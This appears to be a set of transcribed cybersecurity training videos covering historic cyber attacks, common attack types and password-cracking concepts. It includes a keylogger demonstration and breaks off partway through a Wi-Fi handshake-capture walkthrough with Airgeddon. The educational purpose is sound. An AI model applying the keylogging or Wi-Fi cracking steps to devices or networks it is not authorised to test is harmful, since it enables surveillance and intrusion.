attract bees, dummy computer systems, called honeypots, are used to attract attackers. These systems are made to look vulnerable in order to deceive attackers, and this, in turn, defends the real system. In addition to these, she also decided to use unique alphanumeric passwords, antivirus software, and started avoiding mails from unknown senders. That was Anne's story. Cyber attacks are not just confined to individuals, but also to public and private organizations. The cyber attacks carried out in such places are more deadly, and they result in colossal losses. Motives of such attacks are many, starting from tampering with crucial data to monetary gains. Let's have a look at a few of the cyber attacks that companies are subjected to. Various public sector organizations and large corporations face the Advanced Persistent Threat, APT. In this form of attack, hackers gain access to networks for a prolonged period in order to continuously gain confidential information. Companies also witness the denial of service attack, where networks are flooded with traffic, which in turn leaves legitimate service requests unattended. A variant of this is the distributed denial of service, DDoS attack, when multiple systems are used to launch the attack. When a hacker manipulates a standard SQL query in a database-driven website, it is known as a SQL injection attack. By doing so, hackers can view, edit, and delete tables from databases. Amidst a plethora of cyber attacks, it is indeed a challenge for organizations with several networks and servers to ensure complete security. This is not an easy task, and to help with this, cybersecurity professionals are hired to work on identifying cyber threats and securing a company's network. There are multiple job roles in the field of cybersecurity. If hacking fascinates you, then the role of an ethical hacker is something to be explored. Such professionals try to exploit a network's vulnerabilities, just like how a hacker would do, but only to identify those vulnerabilities and resolve them for protection against an actual cyber attack. But if you are looking to design robust security structures, then the role of a security architect is more apt. A Chief Information Security Officer, CISO, plays a crucial role in enterprise security and is entrusted with the overall safety of the information in an organization. With the increase in the production of global digital data, it is anticipated that cyber attacks will quadruple in the near future. Organizations are going to need cybersecurity professionals who can prevent these attacks. A career in the field of cybersecurity is lucrative and a very smart decision for professionals now. So, what are you waiting for? Get certified with Simplilearn and become a cybersecurity expert.
Let's see what we have at number 10. From April 27, 2007, Estonia, the European country, faced a series of cyber attacks that lasted for weeks. This happened when the Estonian government decided to move the bronze soldier from Tallinn center to a less prominent military cemetery located on the city's outskirts. Unprecedented levels of internet traffic took down Estonian banks' online services, media outlets, broadcasters, and government bodies. Botnets sent massive waves of spam and vast amounts of automated online requests. According to researchers, the public faced DDoS attacks. There were conflicts to edit the English language version of the Bronze Soldier's Wikipedia page as well. Although there is no confirmation, Russia is believed to be behind these cyber attacks that largely crippled the Estonian society. Let's now move on to the next attack. On December 23, 2015, several parts of Ukraine witnessed a power outage. And this was not a typical blackout, it was indeed the result of a cyber attack. Information systems of 3 energy distribution companies in Ukraine were compromised. It is the first known victorious cyber attack on a power grid. It is said that here hackers sent out phishing emails to the power companies. 30 substations were switched off and about 230,000 people were left in the dark for about 1 to 6 hours. US investigators believed that Russia-based hackers were responsible for this. Experts have warned that other countries could also be vulnerable to such attacks. Let's see what we have at number 8. In the year 1999, a cyber attack caused a 21-day shutdown of NASA computers. Unbelievable, isn't it? The hacker was none other than the then 15-year-old Jonathan James. He first penetrated US Department of Defense Division's computers and installed a backdoor on its servers. This allowed him to intercept more than 1,000 government emails, including the ones containing usernames and passwords. This helped James steal a piece of NASA software and crack the NASA computers that support the International Space Station, which cost the space exploration agencies $41,000 as systems were shut down for 3 weeks. He was the first person to carry out a computer hack against the American Space Agency. Let's now move on to the next attack. In late November 2014, there was a leak of confidential data from the film studio of Sony Pictures. Information about Sony Pictures employees, their emails, copies of the then unreleased Sony films, future propositions, and other crucial data were leaked. This cyber attack was carried out by a hacker group named Guardians of Peace. So what did the hackers want? Well, they demanded that Sony withdraw its then upcoming movie, The Interview. This movie was a comedy storyline to assassinate the North Korean leader Kim Jong-un. Sony then decided to cancel the film's theatrical release due to the threats at cinemas screening the movie. It is indeed hard to trace the roots of a cyber attack. In this case, after evaluation, the US intelligence officials arrived at the theory that the attack was in a way related to the government of North Korea. However, North Korea had denied the same. Moving on to our number 6. In December 2006, TJX, the US retailer company, identified that 45.6 million debit and credit card details were stolen. This happened from one of its systems over 18 months by an unknown number of intruders. It was one of the first, largest ever cyber attacks involving the loss of personal data. As a result, banks in the affected regions had to reissue and block thousands of payment cards. A group of hackers did this, Albert Gonzalez being the mastermind. The group was from Miami, the place where the TJX heist was believed to have originated. Reports said that the TJX data breach occurred because of weak web encryption at 2 of its Marshall stores in Miami. Next, moving on to our top 5, let us see what we have at number 5. The year 2010 witnessed the discovery of the deadly computer worm Stuxnet. This malware's motive was unlike any other usual cyber attacks. It aimed at destructing the equipment the computers controlled. Stuxnet came with the deadly purpose of damaging Iran's nuclear infrastructure. It infected more than 200,000 computers, including 14 industrial sites and a uranium enrichment plant in Iran. Stuxnet initially spread via Microsoft Windows and targeted Siemens industrial control systems. Although it was discovered only in 2010, it is believed to have been silently sabotaging Iran's nuclear facilities. It was one of the first discovered malware that was capable of hampering hardware systems. It largely damaged the centrifuges of the Iranian reactors. This is believed to be a cyber weapon created by the US and the Israeli intelligence, although there is no documented evidence or acceptance by either of the countries for the same. Moving on to number 4. In the year 2014, Home Depot was the victim of one of the deadliest cyber attacks. 56 million payment cards were compromised along with 53 million customer email addresses stolen. This security breach happened from April to September 2014. Criminals were believed to have used a third-party vendor's username and password to enter the perimeter of Home Depot's network. The attackers were then able to deploy custom-built malware on its self-checkout systems in the US and Canada. Moving on to our top 3. As you might be aware, the PlayStation gaming system is one of Sony's most popular products. Unfortunately, in April 2011, Sony executives witnessed abnormal activity on the PlayStation network. This resulted in the compromise of approximately 77 million PlayStation users' accounts and prevented users of PlayStation 3 and PlayStation Portable consoles from accessing this service. This forced Sony to turn off the PlayStation network on April 20th. On May 4th, Sony confirmed that personally identifiable information from each of the 77 million accounts had been exposed. The outage lasted for 23 days. Sony released almost daily announcements concerning the system outage. In the end, Sony is believed to have invested approximately $170 million to improve the network's security, to investigate the attack, and to cover the expenses of caring for the consumers that had been affected. Let's now move on to the next attack at number 2. In May 2017, one of the most dangerous cyber attacks took place. It was known as the WannaCry ransomware attack, caused by the WannaCry crypto worm. The victims were the users that used the unsupported version of Microsoft Windows and those who hadn't installed the new security update. This did not take place through phishing like other attacks, but through an exposed vulnerable SMB port. The attack originated in Asia and then eventually spread across the globe. In a day, more than 200,000 computers were infected across 150 countries. The WannaCry cryptoworm locked the users out of the targeted systems and encrypted their data. The users were asked for a ransom of $300 to $600, which had to be paid via Bitcoin in exchange for their data. This attack took a toll on both private and government organizations. It resulted in damages from hundreds of millions to billions of dollars. In a matter of few days, the emergency patches released by Microsoft halted the attack. Also, the discovery of a kill switch prevented the infected computers from spreading the cryptoworm. Security experts in a few countries believed that North Korea was behind this attack. And finally, let's see what we have at number 1. More than 2 decades ago, in March 1999, the Melissa virus, a mass mailing macrovirus, was released. It targeted Microsoft Word and Outlook-based systems and created considerable network traffic. Melissa virus infected computers via emails. The email would look like an important message? Well, yes, it was fake. If the recipient opens the attachments in the mail and downloads the document and then opens it with Microsoft Word, a virus was released on their computers. This would then mass mail itself to the first 50 people in the victim's contact list and then disable multiple safeguard features on Microsoft Word and Microsoft Outlook. This began spreading like a wildfire across the internet. David L. Smith released the virus. The virus caused nearly $80 million worth of damages. It did not steal data or money, however, it caused a havoc. Almost 1 million email accounts were disrupted worldwide, agencies were overloaded, and some had to be shut down entirely, and internet traffic in some locations was slowed down. Do you agree with our list? If you're aware of any other great interesting computer hacks in history, do let us know in the comment section below.
Let's begin with the rise in cybercrimes. So, let's talk about WannaCry. This is something that happened way back in 2017. Let's not say way back, it's just 2019, 2 years back, and it took the world by storm. So it was a cyber attack which encrypted the data of organizations, and then the hackers held that organization ransom by asking, or rather demanding, money from them to decrypt their own data. So what exactly happened? The attack originated in Asia and then spread across the rest of the world. Note the date. And how did this happen? There was a vulnerability that was identified in Microsoft Windows, the SMB vulnerability. SMB, which is server message block, is essentially the file sharing and the printer sharing services that you use in a LAN environment on Windows operating system. By default, these are enabled on your desktops, and there is a hardening guide that people utilize to either upgrade the version of SMB to a more secure version or to disable SMB and utilize something else. Now, this was a known vulnerability, and this was targeted. Within days. More than 230,000 computers were infected across 150 countries. Now, when we say this was identified, Microsoft knew of this vulnerability, and in fact, they had released a patch in April of 2017 to mitigate this vulnerability. Within 2 months of that release, this attack had happened. Now, in a real world scenario, it is not possible for all the servers and devices to be upgraded to the latest patch level, because organizations need to test those patches to see if those patches are going to interfere with the services that they are providing. And hence, no organization will be completely patched up at any point in time. And this was the flaw that sadly took down a lot of organizations. The patch was available, but it wasn't testing. Some were not utilizing it yet, and they did not see it as a high value risk. And suddenly something happened and WannaCry took place. Now, what happened was a crypto worm called WannaCry, which basically encrypts the data and locks the user out of their own computers. And they get a screen in front of them which says your data has been encrypted, and it gives them a link, and they demand $300 to $600 to be paid to the hackers to retrieve the decryption key for their data. Now here, obviously you're not going to pay cash to hackers, neither are you going to make a bank transfer, because both of the ways you can identify the hackers and then pursue them. So the hackers demanded this exchange via bitcoins, cryptocurrency. This is the best way to remain anonymous and the best way to make payments over the internet without being identified. So what was the impact of the attack? Around 200,000 to 300,000 computers were infected. Now it sounds like a small number of computers when we're talking about global. However, the services that it affected were huge. In UK, the National Health Service got affected, all the databases got encrypted, surgeries and treatments of patients were postponed, FedEx, Renault, Nissan, all of these organizations got compromised and their production lines basically shut down for a few days till they retrieved data from backup, started to restore, and then tried to bring back everything to normal. Then in February 2019, Dunkin' Donuts announced that the users of their reward programs were targeted by a credential surfing attack. That means that the attackers stole the credentials, usernames, and passwords of customers of Dunkin' Donuts. Now we think Dunkin' Donuts, they sell donuts, how much could it impact anyone? But if you have an online account with Dunkin' Donuts, you also have your personal identifiable information stored in those accounts. For example, your name, address, credit card information, maybe your social security number or your national insurance card or something like that, which can lead to identity theft. People can misuse that information, pretend to be you, and then take out loans or do transactions in your name where you are going to end up paying those bills. So stealing of such kind of data is going to impact all the users adversely. So the first name, last name, and email IDs were stolen. That is still good enough to launch social engineering attacks and target these victims to phishing attacks or similar attacks. So now let's look at the different types of attacks in cyber. So we are going to discuss these 6 malwares. We are going to talk about social engineering attacks, man-in-the-middle attacks, denial of service, SQL injections, and password attacks. Now if you look at this, malwares basically target hosts, operating systems. Social engineering attacks would address or attack the gullibility of a human being with the help of a computer. For example, sending a fake mail or hosting a fake website. Man-in-the-middle attack would target a network and then try to capture data packets within the network, thus compromising your credentials. A denial of service attack would crash a service. SQL injection attacks would attack an application, and a password attack would attack the usernames and passwords of accounts, thus taking advantage of weak passwords and getting access to your accounts. So let's start with malwares. Malware basically refers to malicious software. The first part of malicious, mal, and the ware out of software becomes malware. Malwares are nothing but vehicles in which hackers embed payloads. Payloads could be viruses, worms, ransomwares, trojans. So they hide these kind of malicious softwares within legitimate looking softwares and they post them on the internet. People who are interested in those kind of softwares will obviously download them, and since they are looking very legitimate, they will try to install them, thus accidentally and unknowingly installing a Trojan, virus, or a ransomware on their machine. Now, most of us have done this at one point in time where we have looked at pirated software because we did not want to pay for it. And then we probably go to torrents and then search for those softwares, download them, and there is a keygen.exe over there which we have to execute. And then we have to copy that code, the exe file that comes out with the keygen, and then we have to replace it. And I mean, it's a very convoluted process. But the fact that you have to restore some code with some other code would basically mean that there is something wrong with that file. So 99% of the time, these programs would have viruses or trojans embedded within them, and it is going to affect the security posture of your computers. If you scan keygen.exes with any antivirus across the globe, they will always report them as malwares, and they will probably want to delete those kind of files. So how do these get infected? It gets infected into a system when the user clicks on a suspicious link. Now, obviously, if you think it is a suspicious link, you're not going to click on it. But you trust the link or you're compelled to click on it just out of curiosity. Let's say you click on that link, there's a redirector, it downloads an attachment from a malicious server and it gets installed on your machine. Most of the common ways a virus or a worm is spread is through USB devices. People pass around USB devices like nobody's business, and you have no idea where that device has been used before, and you plug into your machine, and if there is a virus on that USB device, it will get infected on your machine as well. Malwares are nothing but malicious softwares that pose as legitimate softwares but will have a virus, trojan, or a worm embedded within it, right? It could also be a keylogger. A keylogger is nothing but another software that is created to catch all the keystrokes that the user is making, create a copy of it and store it and send it back to the hacker. So whatever the user is typing, it will now be known to the hacker. It could be bank details, passwords, any personal information that the user might want to keep secret. We are going to look at 3 different demos here. This demo is just to showcase a couple of things. We are going to look at a keylogger, how a keylogger works, this virtual machine here, and I've already downloaded a keylogger and installed it. The idea of this demo is to showcase how a keylogger functions, right? So you can see online on the screen, we are using a free keylogger.en.softonic.com. We are on this site and you can download the free keylogger right from here. What I've done using my demos is that I've always have a keylogger running in the background to capture all the keystrokes that I've been doing whenever I'm doing any demos. So this keylogger here can actually be hidden in the taskbar, but for our demo purposes, I've kept it visible. When you click on it, it will open up and give you a basic screen where you can start navigating about the keylogger. Now you can see that on 8th, which is today, it already shows some keystrokes, applications, and some visited websites. As you can see, already been browsing using the browser over here, and which has been recorded by the keylogger in the background. And just to give you an example, if I click on this file, you will see all the keystrokes that I have been doing so far. And you can see I've gone to this, I've opened up my Mozilla Firefox, I've typed in a search keyword of free keylogger. Then I've gone onto the website is my password.net, in which I may have tried out a few passwords myself. And then I've gone and copy pasted this URL into the browser window, and you can see all of this has been recorded. And just to emphasize on that, let's go on to another website, and let's go to facebook.com. I'm not actually going to log in, I'm just going to type in a random username, so someone at Simplilearn.com, and a password like ASD@1234, and I'm going to try to log in. Obviously the login is going to fail because this account doesn't exist, but we want to see what happens in the background when the keylogger picks up the keystrokes that we have typed. So let's open up the keylogger again and go and see what is there in the keystrokes and clipboard. And you can see over here that we typed in facebook.com, enter, and then we did not type in the username. That's the difference here. We selected it from a drop down. So a keystroke logger or keylogger has not been able to capture that input. A keylogger in its essence is only records something that has been typed in by the user real time. Since we did not type in the username, it did not record that username, but we typed in the password, and you can see the password over here, ASD@1234. And this is how a keylogger works. It only captures the keystrokes that have been typed in real time. So if we use this exercise on our victims and they're just using drop-down menus, at that point in time, none of the data is going to be recorded. For that activity, you would need something which is known as spyware, which would capture screens, which would capture all of this information that is going on. Now, apart from just logging keystrokes, what this software also does is it also has a list of used applications. You can see all the applications that have booted up along with the operating system and the ones that have started up after the operating system has booted. It also has a list of the visited websites. So you can see these are the websites that we have been visiting, and they have been listed right here. The last one being Facebook, login or sign up, right? So this can store history for a really long time. If I go back in time and if I look at some of the demos that I've been looking at, so on 14th of September, these were the keystrokes that I utilized when I was doing some trainings or while I was providing some demos on other topics. So a keystroke or a keylogger will store all that information and keep on recording it till you actually delete that data, or you can reset the keylogger. You can also set up the keylogger to send an email to you on a daily report to a particular email address that you have sent. So as long as it detects the internet connectivity, this keylogger will send you an email to the email address that you have specified with all the keystrokes that it has logged. Now this is the free version. There's again a paid version for it, so you can go and visit this site and see how this keylogger functions. If I press on the X button over here, it will ask me if I want this to be hidden in the system tray. If I click on yes, it only using this shortcut will I be able to invoke this screen. So just for demo purposes, I do not want this to be hidden. So I'm going to click on no, and you can see that the keylogger is still visible over here. So that was the first demo that we are seeing. Viruses, as we all know, are destructive programs that once executed would destroy data or harm the hard disk or the partition tables. Worms, on the other hand, would be softwares that would be more of a nuisance value, where they're going to replicate themselves in such a way that they would consume the resources of a computer, thus crashing the computer and then requiring a reboot. A Trojan horse is another software that will allow a backdoor entry or a covert channel to the hacker, where the hacker in this case would then be able to gain access to the victim's machine through the covert channel or the backdoor without the knowledge and the authorization of the user themselves. Then let's talk about social engineering attack. Now this is where your people skills come into the picture. This is the art of manipulating people and convincing them to give up confidential information, either knowingly or unknowingly. So most likely, we trust our friends, right? And we talk to them a lot and we give out some confidential information which we would not give out to others. What if somebody is pretending to be our friend just to get this information out of us? And we trust this person, we give out that information, and we suddenly get affected because of that. Now, I'm not saying that everybody in the world does that, but it is one of the most common attacks that is experienced in the computing world. Now, social engineering attacks can be broken down into three categories. First is a phishing attack. Don't worry about that figure over there. You're actually not going to go phishing. It's basically what known as a phishing attack. Then there is a spear phishing attack, and then there's a veiling attack. All of these are types of social engineering attacks where you're targeting a user by sending out fake mails or fake websites, and their gullibility into clicking on those links and then giving out information. So what is a phishing attack? It is a practice wherein a hacker usually sends fake mails which look really genuine, or hosts fake websites which also look genuine and looks like they're from a trusted source. Once you click on those links, there would be embedded scripts or embedded malwares which would then be executed and then get installed on your machines, compromising the security of your device. These utilities could be used to steal credit card information, steal data from your computer, upload data to your computer, use your computer as a bot, and anything and everything that the hacker might want to do. Spear phishing is a variation of phishing. Now, phishing is a non-targeted attack. It is to the whole world at large. Whoever becomes a victim becomes a victim. However, spear phishing is a targeted attack. It is to a specific individual or to a group of individuals in an organization. So, it becomes a customized attack. You identify the victim, you identify the flaws that are existing over there in the organization, you identify the gullibility of the victim, create that fake mail to suit that particular situation, send it across to them. They'll click on that link and get infected by whatever payloads that you have embedded within it. Veiling is when you are targeting particularly wealthy or powerful people in the industry. So normally when you're targeting CEOs, CFOs, high-level management people of an organization, it would be known as a veiling attack. So here the example is where the email has been received. Dear customer, your account is going to expire today. To keep your account activated, please click on the link here and proceed with the verification process. Now here the link that we see, activate.com, would be a hyperlink which is going to mask the actual URL where the link is going to redirect us. Right here, the attack is on the gullibility of the customer, where they would fear that the account would be deactivated, and to prevent that, they would trust this email, click on the link, and then provide the information, thinking that they're just reactivating their account, but they're actually leaking their own information to the attacker. So the first thing you have to understand is banks or any organization are not going to send you any emails with a link in it asking you to reactivate or anything like that. In fact, banks proactively tell us that they're not going to call us and ask for any information. In fact, they would want us to call them on their registered number or the helpline number that they have declared on their website or on the cards that we possess. Then moving on to social engineering. This is something very common in today's world. This is basically where the prey is the human itself. And the reason social engineering attacks are very successful is because of the gullibility factor that a human has. For example, human has something called emotions that a machine wouldn't. You could plead with a human for a password to be reset by gaining sympathy or empathy. But try doing that with a machine, those attacks are going to fail. Social engineering attacks are not only limited to those, but we can talk about phishing. Phishing is also a part of social engineering attack, where the gullibility of the user to click on that link is being exploited. In this scenario here, this is Clark. He is calling from the IT security team. That means that he is impersonating probably, and then telling the victim that the system has been compromised. Please share the password with me. The victim, on the other hand, thinks that the person is trying to help her, probably doesn't verify that person, trust that person, and then provides the password over the phone. Now here, It is fear that is being exploited, because the password being compromised would clearly upset the end user for loss of data or for the computer revealing out confidential information. Thus, here she's trusting the IT security team for the password to be reset and given back to her. Then we come to the network attacks, man in the middle. This is also known as an eavesdropping attack, which literally means that you are going to listen in on to somebody's conversation. For example, in the figure, the client is trying to talk to the server, but you become a man in the middle and you try to listen in on the conversation that is going on. Now, obviously, the conversation over here may not be audio, but be data that is being exchanged between the server and the client. You just listen in, you make a copy of that data and you store it at your end. The data could contain usernames, passwords, may contain confidential information and help you compromise data. The attacking computer takes the IP address of the client. So you find out the IP address of the client. The client is not aware about this. The client is trying to communicate with the server. You spoof yourself as a default gateway or a trusted device, and the client thinks that it is through you that they need to communicate to the server, and thus they start sending data via your PC. So this attack normally happens on public Wi-Fi networks. I've seen that happening a lot, and thus I never recommend anyone using those public Wi-Fis. For example, you go to a coffee shop, they have free Wi-Fi over there, you connect to it and you start surfing, you start browsing. You are always signed into Google, Facebook accounts, your bank accounts and whatnot. And then there's a sniffer, there is a hacker who's doing a man-in-the-middle attack, capturing all that data. Now, it's not an easy attack, but it can be done. So this diagram shows where the man-in-the-middle attack has become successful, and now that the client and the server both are sending information via the attacker without knowing that the attacker is capturing all that data. So here in this example, here suppose you're in trouble and you need money right now, and you call your friend and ask for money. So here the person is calling John, telling John that they're in trouble, and they're asking for John to give their credit card number over the phone. Now, this is a legitimate transaction. The friend is actually calling John and asking for some help. However, when John is providing that help over the phone with the credit card numbers, maybe the CVV number and all of that, and then the OTP at the end of it, at the same time, there could be a hacker doing a man-in-the-middle attack where they could be eavesdropping on whatever is being said or whatever data is being transferred. And once they capture this confidential data, they can then misuse that data to their own gains. Then comes the denial of service attack. The motive in a DOS attack is not to benefit monetarily, but to bring down a service for legitimate users, thus just causing harm to the organization. For example, if I consume the bandwidth of to a particular website, since there's no more bandwidth left, other legitimate users who want to interact with the website will not be able to connect to the website, thus creating a denial of service to those legitimate users. Now, it may not be possible for me to use my laptop to target a cluster of servers, because obviously the bandwidth at the other end would be very high. So I would distribute my attack across multiple devices, thus creating a distributed denial of service, also called a DDoS attack. Then we come to the SQL injection, or SQL. SQL stands for Structured Query Language, which is the de facto language that is used by applications to interact with databases. So let it be a Microsoft SQL database, MySQL database, Oracle SQL. The syntax may be a little bit different, but it is still the structured query language that applications utilize to interact with the database. Now, the queries that are created by the applications need to be sanitized at the application level itself. So developers need to be very careful of how they are going to create those queries, what queries are allowed to go to the database, because a database is designed to answer queries. It doesn't know what is a legitimate query and what is a illegitimate query. If it receives a query, it is going to try to execute it and give out information. Thus, a hacker may insert malicious queries or malformed queries into a SQL server through the vulnerable application, causing a security event. So, depending on the queries that have been created, the attacker could delete some data or modify data, add data, edit it, or do anything that is malicious in nature that would compromise the integrity and the security of that database. For example, the Dunkin' Donuts, right? Except apart from being a credential attack, since they got access to the database, they could have added or deleted any information about any users that were there. So the next attack would be a password attack. As the name suggests, this attack is used to crack or get the password for user's account. When we say crack passwords, this is basically where somebody is trying to brute force, or they're trying to guess the password and they're going to break the password, thus getting access to your accounts. There are 5 different ways passwords can be cracked. The first one is a dictionary attack, where we use every password that is possible through the dictionary. Now this is the use of an actual dictionary, and that's one of the reasons when we try to create passwords, we are advised not to create passwords based on dictionary words, because these are easily guessable and there are lists already out there that contain all of these words. There's a tool that you can utilize, and that tool will then parse through each and every word that is in the dictionary file and then compare it to a possible password. If one of the words matches, the password has then been compromised. So if you are observing a little bit higher security where we have created a password that is not based on the dictionary word, then we want to look at other attacks like brute force. It is a trial and error method. So basically what we do is we identify how the passwords were created. For example, in today's world, the policies would be to consume in a password any of the alphabet characters A through Z, uppercase or lowercase, 0 through 9, and then special characters. And then we want to randomize the usage of these characters so that they are not easily guessable. But a brute force attack at the same time would then try every permutation and combination there is possible in the entire character set and then try to figure out the password. Now this takes a really long time and does take a lot of compute and storage power, and that's where the botnet example comes back in, the one that we saw earlier, which was used for DOS attack. But similarly, if I've infected multiple computers like this, I can then distribute this attack onto all those computers and use the entire compute power that is available to shorten the time that is required to crack the password. Now, this is 100% successful given the time that it may take. So if the time that is going to take is going to be 100 years, the attack becomes unsuccessful because during that period, the password is most likely to be changed, the technology is going to be changed, and so on and so forth. So if the password is easily guessable, this can be a very easy attack to perform. Then a keylogger, which is a similar attack to what we have seen. So a keylogger, as discussed earlier, is nothing but a software that once installed on your machine would grab each and every keystroke that the user has made and store it in a file which the hacker can later on access. So whatever you have been typing, passwords, credit card information, or anything else, all of those would be recorded and stored in a file, and that's one of the best way a password can be compromised. Then shoulder surfing. This is a physical attack rather than being a technical one. Here you need to physically be present when the user is typing in their password, and you actually look over their shoulder to see what they're typing and try to figure out what the password is. If they're quick typers, it is going to be a little bit more difficult. If they're slow typers, it's going to be that much more easy. And the last one is called a rainbow table. Now, passwords, when applications store them, are stored in hash format. Hash is nothing but a one-way signature that is created of the password file, of the word that is used for the password, and it is based on an algorithm. So the input could be of variable length. For example, a password could be 7 to 14 characters, but the output of a hash value would be fixed based on the algorithm that you're consuming. So most common algorithms in today's world that we utilize are SHA, secure hashing algorithms. Before that, we used MD5 or message digest. So all of these convert the passwords from plain text into a hash value and store it into a database. So if you actually attack that database to grab a password, you're going to get the hash value, not the password in clear text. And thus, in that scenario, comes the rainbow table to the rescue. A rainbow table is nothing but a file that will have the list of all possible passwords along with their hash values in the required format. So if you remember the dictionary attack was nothing but a list of words based on the dictionary that were stored in a file, and then the software was just trying each and every word against a possible password. Here, we do not have the word, but we have the hash value. So to reverse engineer a hash value, what we created is, we created a rainbow table where there would be a list of all the possible passwords and their corresponding hash values. So we then compare the hash value that we have captured and then search for that hash value in the file that we have created. The hash value that matches the corresponding word to it is the password in clear text. So these are the 5 types of password attacks.
Cybersecurity has become one of the most rigid industries in the last decade, while simultaneously being the most challenged. With every aspect of corporate culture going online and embracing cloud computing, there is a plethora of critical data circulating through the internet, all worth billions of dollars to the right person. Increasing benefits require more complex attacks, and one of these attacks is a brute force attack. A brute force, or known as brute force cracking, is the Cyberattack equivalent of trying every key on your keyring and eventually finding the right one. Brute force attacks are simple and reliable. There is no prior knowledge needed about the victim to start an attack. Most of the systems falling prey to brute force attacks are actually well secured. Attackers let a computer do the work, that is trying different combinations of usernames and passwords until they find the one that works. Due to this repeated trial and error format, the strength of password matters a great deal. Although with enough time and resources, brute force will break a system since they run multiple combinations until they find the right passcode. A brute force attack, also known as an exhaustive search, is a cryptographic hack that relies on guessing possible combinations of targeted password until the current password is discovered. It can be used to break into online accounts, encrypted documents, or even network peripheral devices. The longer the password, the more combinations that will need to be tested. A brute force attack can be time consuming and difficult to perform if methods such as data obfuscation are used, and at times downright impossible. However, if the password is weak, it could merely take seconds with hardly any effort. Dictionary attacks are an alternative to brute force attacks, where the attacker already has a list of usernames and passwords that need to be tested against the target. It doesn't need to create any other combinations on its own. Dictionary attacks are much more reliable than brute force in a real-world context, but the usefulness depends entirely on the strength of passwords being used by the general population. There is a three-step process when it comes to brute forcing a system. Let's learn about each of them in detail. In step 1, we have to settle on a tool that we are going to use for brute forcing. There are some popular names on the market like Hashcat, Hydra, and John the Ripper. While each of them has its own strengths and weaknesses, each of them perform well with the right configuration. All of these tools come pre-installed with certain Linux distributions that cater to penetration testers and cybersecurity analysts like Kali Linux and Parrot Security. After deciding what tool to use, we can start generating combinations of alphanumeric variables whose only limitation is the number of characters. For example, while using Hydra, a single 6-digit password will create 900,000 passwords with only digits involved. Add alphabets and symbols to that sample space and that number grows exponentially. The popular tools allow customizing this process. Let's say the hacker is aware of the password being a specific 8-digit word containing only letters and symbols. This will substantially increase the chances of being able to guess the right password since we remove the time taken to generate the longer ones. We omit the need for including digits in such combinations. These small tweaks go a long way in organizing an efficient brute force attack since running all the combinations with no filters will dramatically reduce the odds of finding the right credentials in time. In the final step, we run these combinations against the file or service that is being broken. We can try and break into a specific encrypted document, a social media account, or even devices at home that connect to the internet. Let's say there is a Wi-Fi router. The generated passwords are then fed into the connection one after the other. It is a long and arduous process, but the work is left to the computer rather than someone manually clicking and checking each of these passcodes. Any password that doesn't unlock the router is discarded and the brute force tool simply moves on to the next one. This keeps going on until we find the right combination which unlocks the router. Sometimes reaching the success stage takes days and weeks, which makes it cumbersome for people with low computing power at their disposal. However, the ability to crack any system in the world purely due to bad password habits is very appealing, and the general public tends to stick with simple and easy to use passwords. Now that we have a fair idea about how brute force works, let's see if we can answer this question. We learned about how complex passwords are tougher to crack by brute force. Among the ones listed on the screens, which one do you believe will take the longest to be broken when using brute force tools? Leave your answers in the comment section and we will get back to you with the correct option next week. Let's move on to the harmful effects of getting a system compromised due to brute force attacks. A hacked laptop or mobile can have social media accounts logged in, giving the hackers free access to the victim's connections. It has been reported on multiple occasions where compromised Facebook accounts are sending malicious links and attachments to people on their friends list. One of the significant reasons for hacking, malware infusion is best done when spread from multiple devices, similar to distributing spam. This reduces the chance of circling back the source to a single device which belongs to the hacker. Once brute forced, a system can spread malware via email attachments, sharing links, file upload via FTP, etc. Personal information such as credit card data, usage habits, private images and videos are all stored in our systems, be it in plain format or root folders. A compromised laptop means easy access to these information that can be further used to impersonate the victim regarding bank verification, among other things. Once a system is hacked, it can also be used as a mail server that distributes spam across lists of victims. Since the hacked machines all have different IP addresses and MAC addresses, it becomes challenging to trace the spam back to the original hacker. With so many harmful implications arising from a brute force attack, it's imperative that the general public must be protected against such. Let's learn about some of the ways we can prevent ourselves from becoming a victim of brute force attacks. Using passwords consisting of alphabets, letters, and numbers have a much higher chance of withstanding brute force attacks thanks to the sheer number of combinations they can produce. The longer the password, the less likely it is that a hacker will devote the time and resources to brute force them. Having alphanumeric passwords also allows the user to keep different passwords for different websites. This is to ensure that if a single account or a password is compromised due to a breach or a hack, the rest of the accounts are isolated from the incident. Two-factor authentication involves receiving a one-time password on a trusted device before a new login is allowed. This OTP can be obtained either via email, SMS, or specific 2FA applications like Authy and Aegis. Email and SMS based OTPs are considered relatively less secure nowadays due to the ease with which SIM cards can be duplicated and mailboxes can be hacked. Applications that are specifically made for 2FA cores are much more reliable and secure. CAPTCHAs are used to stop bots from running through web pages precisely to prevent brute forcing through their website. Since brute force tools are automated, forcing the hacker to solve CAPTCHA for every iteration of a password manually is very challenging. The CAPTCHA system can filter out these automated bots that keep refreshing the page with different credentials, thereby reducing the chances of brute force considerably. A definite rule that locks the account being hacked for 30 minutes after a specific number of attempts is a good way to prevent brute force attempts. Many websites lock account for 30 minutes after 3 failed password attempts to secure the account against any such attack. On an additional note, some websites also send an email instructing the user that there have been 3 insecure attempts to log into the website. Let's look at a demonstration of how brute force attacks work in a real-world situation. The world has gone wireless. With Wi-Fi taking the reins in every household, it's natural that their security will always be up for debate. To further test the security index and understand brute force attacks, we will attempt to break into the password of a Wi-Fi router. For that to happen, we first need to capture a handshake file, which is a connection file from the Wi-Fi router to a connecting device like a mobile or a laptop. The operating system used for this process is Parrot Security, a Linux distribution that is catered to penetration testers. All the tools being used in this demo can easily be found pre-installed in this operating system.
If getting your learning started is half the battle, what if you could do that for free? Visit SkillUp by Simplilearn. Click on the link in the description to know more.
To start our demo, we're going to use a tool called Airgeddon, which is made to hack into wireless networks specifically. At this point, it's going to check for all the necessary scripts that are installed in the system. To crack into a Wi-Fi and to capture the handshake file, we're going to need an external network card. The significance of the external network card is a managed mode and a monitor mode. For now, the WLX1 named card is my external network adapter, which I'm going to select. To be able to capture data over the air, we're going to need to put it in monitor mode. As you can see above, it's written it is in managed mode right now. So we're going to select option 2, which is to put the interface in monitor mode. And its name is now WLAN 0 monitor. The monitor mode is necessary to capture data over the air. That is the necessary reason why we need an external card, since a lot of inbuilt cards that come with the laptops and the systems, they cannot have a monitor mode installed. Once we select the mode, we can go into the fifth, which is the handshake tools menu. In the first step, we have to explore for targets, and it is written that monitor mode is necessary to select a target. So let's explore for targets and press enter. We have to let this run for about 60 seconds to get a fair idea about the networks that are currently working in this locality. For example, this ESS ID is supposed to be the Wi-Fi name that we see when connecting to a network. Geo24, Recover Me, these are all the names that we see on our mobile when trying to search for the Wi-Fis. This BSS ID is supposed to be an identifier, somewhat like a MAC address that identifies this network from other devices. The channels features on one or two, there are many channels that the networks can 